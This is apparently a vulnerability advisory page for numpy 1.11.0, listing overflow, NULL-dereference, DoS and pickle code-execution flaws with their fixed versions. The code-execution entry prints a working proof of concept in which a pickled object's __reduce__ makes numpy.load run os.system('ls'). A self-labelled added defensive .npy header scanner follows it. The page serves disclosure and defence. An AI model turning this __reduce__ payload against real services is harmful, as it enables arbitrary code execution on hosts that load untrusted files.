numpy@1.11.0 vulnerabilities

Fundamental package for array computing in Python

Direct Vulnerabilities

Known vulnerabilities in the numpy package. This does not include vulnerabilities belonging to this package’s dependencies.

Severity: Low
Buffer Overflow

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Buffer Overflow in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code.

How to fix Buffer Overflow?

Upgrade numpy to version 1.21.0rc1 or higher.

Vulnerable versions: [,1.21.0rc1)

Severity: Low
Buffer Overflow

Affected versions of this package are vulnerable to Buffer Overflow due to missing boundary checks in the array_from_pyobj function of fortranobject.c. This may allow an attacker to conduct Denial of Service by carefully constructing an array with negative values.

How to fix Buffer Overflow?

Upgrade numpy to version 1.22.0 or higher.

Vulnerable versions: [,1.22.0)

Severity: Low
NULL Pointer Dereference

Affected versions of this package are vulnerable to NULL Pointer Dereference due to missing return-value validation in the PyArray_DescrNew function, which may allow attackers to conduct Denial of Service attacks by repeatedly creating and sorting arrays.

Note: This is likely to happen only if application memory is already exhausted, as it requires the newdescr object in PyArray_DescrNew to evaluate to NULL.

How to fix NULL Pointer Dereference?

Upgrade numpy to version 1.22.2 or higher.

Vulnerable versions: [0,1.22.2)

Severity: Low
Denial of Service (DoS)

Affected versions of this package are vulnerable to Denial of Service (DoS) due to an incomplete string comparison in the numpy.core component, which may allow attackers to make the APIs fail by constructing specific string objects.

How to fix Denial of Service (DoS)?

Upgrade numpy to version 1.22.0rc1 or higher.

Vulnerable versions: [,1.22.0rc1)

Severity: Critical
Arbitrary Code Execution

Affected versions of this package are vulnerable to Arbitrary Code Execution. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.

PoC by nanshihui:

import numpy
from numpy import __version__
print(__version__)
import os
import pickle

# Any object whose __reduce__ returns a callable is executed when it is unpickled.
class Test(object):
    def __init__(self):
        self.a = 1

    def __reduce__(self):
        return (os.system, ('ls',))

tmpdaa = Test()
with open("a-file.pickle", 'wb') as f:
    pickle.dump(tmpdaa, f)
# numpy before 1.16.3 defaults to allow_pickle=True, so load() unpickles the file and runs 'ls'.
numpy.load('a-file.pickle')

How to fix Arbitrary Code Execution?

Upgrade numpy to version 1.16.3 or higher.
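Added defensive example, not part of the Snyk advisory or of numpy itself: the 1.16.3 fix made numpy.load default to allow_pickle=False, which rejects both bare pickle files like the PoC's a-file.pickle and .npy files whose dtype is object (those are stored by pickling each element). The scanner below reads the .npy header (numpy.lib.format layout) with the standard library only, so a service can classify an upload before numpy.load ever touches it; build_npy and all sample bytes are constructed for this example.

```python
import ast
import struct

NPY_MAGIC = b"\x93NUMPY"


def parse_npy_header(data):
    """Parse a .npy header dict without numpy; ValueError if not a well-formed .npy."""
    if not data.startswith(NPY_MAGIC) or len(data) < 12:
        raise ValueError("missing .npy magic")
    major = data[6]
    if major == 1:            # v1.x: uint16 header length, latin1 header text
        hlen, start, enc = struct.unpack("<H", data[8:10])[0], 10, "latin1"
    elif major in (2, 3):     # v2.x/v3.x: uint32 header length; v3 text is utf-8
        hlen, start, enc = struct.unpack("<I", data[8:12])[0], 12, ("latin1", "utf-8")[major - 2]
    else:
        raise ValueError("unsupported .npy version %d" % major)
    raw = data[start:start + hlen]
    if len(raw) != hlen:
        raise ValueError("truncated .npy header")
    try:
        meta = ast.literal_eval(raw.decode(enc))  # literal dict only, never eval()
        _ = meta["descr"]                         # must be a dict carrying a dtype descr
    except (ValueError, SyntaxError, UnicodeDecodeError, TypeError, KeyError):
        raise ValueError("malformed .npy header")
    return meta


def descr_has_object(descr):
    """True if the dtype descr has an object ('O') field: stored pickled, so it needs allow_pickle=True."""
    if isinstance(descr, str):
        return descr.lstrip("<>|=").startswith("O")
    return any(descr_has_object(field[1]) for field in descr)  # structured dtype: (name, descr[, shape])


def classify_npy(data):
    """'array' (loads with allow_pickle=False), 'object-array' (needs pickle), 'not-npy' (e.g. a bare pickle)."""
    try:
        meta = parse_npy_header(data)
    except ValueError:
        return "not-npy"
    return "object-array" if descr_has_object(meta["descr"]) else "array"


def build_npy(descr, shape, payload):
    """Build a minimal v1.0 .npy byte string; used only to construct sample files for this example."""
    header = "{'descr': %r, 'fortran_order': False, 'shape': %r, }" % (descr, shape)
    pad = (64 - (10 + len(header) + 1) % 64) % 64  # total header block is 64-byte aligned
    header = header + " " * pad + "\n"
    return NPY_MAGIC + b"\x01\x00" + struct.pack("<H", len(header)) + header.encode("latin1") + payload
```

Anything classified as "object-array" or "not-npy" is exactly what numpy.load refuses under allow_pickle=False, so the check reproduces the patched behaviour without having to open the file in numpy at all.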

Vulnerable versions: [0,1.16.3)

Severity: High
Denial of Service (DoS)

numpy is a package for scientific computing with Python.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing input validation: an empty list or array causes an infinite loop.

How to fix Denial of Service (DoS)?

Upgrade numpy to version 1.13.3 or higher.

Vulnerable versions: [,1.13.3)